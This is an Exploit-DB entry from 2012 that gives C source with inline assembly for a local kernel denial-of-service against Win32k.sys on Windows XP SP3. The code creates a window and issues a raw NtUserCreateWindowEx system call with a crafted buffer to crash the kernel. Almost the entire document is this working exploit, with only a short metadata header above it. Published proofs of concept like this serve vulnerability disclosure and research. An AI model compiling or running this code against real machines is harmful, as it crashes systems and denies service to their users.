Microsoft Windows XP - Win32k.sys Local Kernel DoS Vulnerability

2012-05-02T00:00:00
ID EDB-ID:18819
Type exploitdb
Reporter Lufeng Li
Modified 2012-05-02T00:00:00

Description

Microsoft Windows XP - Win32k.sys Local Kernel DoS Vulnerability. Dos exploit for windows platform

                                        
                                            ////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
// Author: Lufeng Li of Neusoft Corporation
// Vendor: www.microsoft.com
// Vulnerable: Windows xp sp3(full patch)
//
/////////////////////////////////////////////////////////////////////////////

#include <Windows.h>
#include <stdio.h>

void NtUserCreateWindowEx(HANDLE d1,int d2,int d3)
{
	_asm{
		xor eax,eax
		push eax
		push eax
	    	push eax
	    	push eax
	    	push eax
	    	push eax
	    	push eax
		push eax
		push eax
	    	push eax
	    	push eax
	    	push eax
	    	push d3
	    	push d2
		push d1
		push eax
		mov eax,0x1157
		mov edx,7FFE0300h
		call  dword ptr[edx]
		ret 0x3c
	}
}
void main()
{
	UINT i=0;
	UINT c[]={  
 0x00000000,0x28001500,0xff7c98cc,0x23ffffff
,0x167c98cc,0x007c98fb,0x02001500,0x78010000
,0x00000000,0x00001500,0x00000000,0x00001500
,0x00000000,0x00001500,0x00000000,0x00000000
,0x00000000,0x00000000,0x34000000,0x3cc00000
,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000
,0x00000000,0x18000000,0x000007fb,0xf8000000
,0x200007fd,0x347c92e9,0x02c00000,0x4c000000
	};
		HWND _wnd = CreateWindowEx(WS_EX_TOPMOST,
								"magic",
								"magic",
								WS_POPUP,
								100,
								100,
								100,
								100,
								0,
								0,
								GetModuleHandle( 0 ),
								0);
	NtUserCreateWindowEx(_wnd,0x26,(UINT)c);
}